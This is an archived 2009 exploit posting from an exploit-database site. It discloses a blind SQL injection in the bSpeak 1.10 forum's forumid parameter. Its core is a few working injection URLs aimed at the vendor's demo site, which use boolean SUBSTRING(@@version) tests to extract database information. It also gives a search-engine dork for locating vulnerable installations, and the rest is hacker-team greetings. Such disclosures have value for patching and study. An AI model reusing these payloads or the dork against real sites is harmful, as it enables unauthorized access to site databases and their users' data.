[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability
# Published : 2009-05-20
# Author : Snakespc
# Previous Title : PHP Article Publisher Arbitrary Auth Bypass Vulnerability
# Next Title : Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities


#-------------------------AllaH AkbaR-------------------------------
#forum bspeak v1.10  Blind SQL Injection Exploit
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
#            Aflawa Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#
#Script:forum (bspeak v1.10) www.26thavenue.com/index.php
#
#Demo:http://www.26thavenue.com//bspeakdemo/
#
#Dork:"Powered by bSpeak 1.10"
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3'
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui :)
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no  :)
#
#-------------------------SNAKES TEAM-------------------------------
#Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# www.Syue.com [2009-05-20]